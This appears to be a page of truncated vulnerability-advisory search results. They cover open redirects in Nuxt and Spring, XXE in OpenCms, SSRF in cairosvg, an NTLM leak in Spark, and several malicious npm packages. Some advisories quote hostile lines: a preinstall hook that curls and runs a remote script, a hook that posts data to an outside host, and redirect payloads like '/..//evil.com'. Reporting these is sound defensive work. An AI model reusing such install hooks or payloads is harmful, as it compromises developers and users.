CVE-2026-56326

Nuxt.js (versions 4.0.0–4.4.6 and 3.x up to 3.21.6) contains a server-side open redirect vulnerability in navigateTo due to improper validation of path-normalized payloads (e.g., /..//evil.com, /.//evil.com). Attackers can bypass external-host checks via path-normalization techniques to redirect ...

Malicious code in backoffice-charges-module (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 047eb92a0e8bb401b2c205765616c9b4b715ee7cfd33d2e6ef9dc8d645b77f04 On every npm install, the preinstall lifecycle script node index.js /dev/null 2&1 silently HTTPS-POSTs a JSON payload to https://avamnrwqo7.rbmock.de...

PT-2026-51413

Name of the Vulnerable Software and Affected Versions Nuxt versions prior to 4.4.7 Nuxt versions prior to 3.21.7 Description Nuxt contains three security issues related to client-navigation URL handling via the navigateTo and reloadNuxtApp functions. First, a server-side open redirect exists in...

CVE-2026-47157

aiograpi (Python) before 0.9.10 accepted server-supplied signup challenge paths and built request URLs before validating that the paths were relative Instagram API paths. An attacker who can influence a challenge response (e.g., on a local network, via DNS, or via a proxy) could cause challenge h...

MAL-2026-5645 Malicious code in sn-internal-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...

Malicious code in grateful-payments (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1a7a07a0a09ed8037058353b9b9b067e25e3cbe783eaab8d54276d490f823471 On npm install, the package's postinstall script src/canary.js performs a DNS lookup and HTTPS GET to the hardcoded host...

CVE-2026-41844

A Spring MVC or Spring WebFlux application which configures a mapping for "/" where the view name is not explicitly specified allows an attacker to craft a link resulting in a 302 redirect to an arbitrary external host via the redirect: prefix. Affected versions: Spring Framework 7.0.0 through...

CVE-2026-41844

The CVE-2026-41844 entry concerns Spring Framework components Spring MVC and Spring WebFlux. Affected are Spring Framework versions 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; and 5.3.0–5.3.48. Description: when an application configures a mapping for "/**" and the view name is not explicitly specif...

EUVD-2026-35332

A Spring MVC or Spring WebFlux application which configures a mapping for "/" where the view name is not explicitly specified allows an attacker to craft a link resulting in a 302 redirect to an arbitrary external host via the redirect: prefix. Affected versions: Spring Framework 7.0.0 through...

CVE-2023-42346

Alkacon OpenCms before 16 allows XXE when the refers to an external host...

GHSA-PJ6P-9P8X-5MFC Alkacon OpenCms is vulnerable to XXE when the <!DOCTYPE> refers to an external host

Alkacon OpenCms before 16 allows XXE when the refers to an external host...

CVE-2023-42346

CVE-2023-42346 affects Alkacon OpenCms before version 16, where an external-hosted DOCTYPE can trigger a server-side XML External Entity (XXE) vulnerability. The root cause is improper handling of external entities in XML processing, leading to potential exposure of confidential data (CVSS 3.1 ba...

CVE-2023-42346

Alkacon OpenCms before 16 allows XXE when the refers to an external host...

CVE-2020-12772

An issue was discovered in Ignite Realtime Spark 2.8.3 and the ROAR plugin for it on Windows. A chat message can include an IMG element with a SRC attribute referencing an external host's IP address. Upon access to this external host, the NTLM hashes of the user are sent with the HTTP request. Th...

Astra Linux – Vulnerability in Linux 6.1

In the Linux kernel, the following vulnerability has been resolved: scsi: mpi3mr: Avoid memcpy field-spanning write warnings When the “storcli2 show” command is executed for eHBA-9600, the mpi3mr driver prints this warning message: memcpy: A field-spanning write size 128 was detected in the singl...

Server-side Request Forgery (SSRF)

cairosvg is vulnerable to Server-side Request Forgery SSRF and Denial of Service DOS. The vulnerability is due to allowing the loading of external host resources by default during parsing, allowing an attacker to parse a maliciously crafted file from an external resource, resulting in Server-side...

Micro-Star International MSI Feature Navigator v1.0.1808.0901 安全漏洞

Micro-Star International MSI Feature Navigator is a feature navigator from Micro-Star International China. A security vulnerability exists in Micro-Star International MSI Feature Navigator version v1.0.1808.0901. An attacker can exploit this vulnerability to download arbitrary files from an...

Design/Logic Flaw

An issue was discovered in Ignite Realtime Spark 2.8.3 and the ROAR plugin for it on Windows. A chat message can include an IMG element with a SRC attribute referencing an external host's IP address. Upon access to this external host, the NTLM hashes of the user are sent with the HTTP request. Th...

Mail.ru: molotok.m.mail.ru delegated to external entity

SDC bypass secure cookies access vulnerability in m.mail.ru due to subdomain name pointing to uncontrolled external host...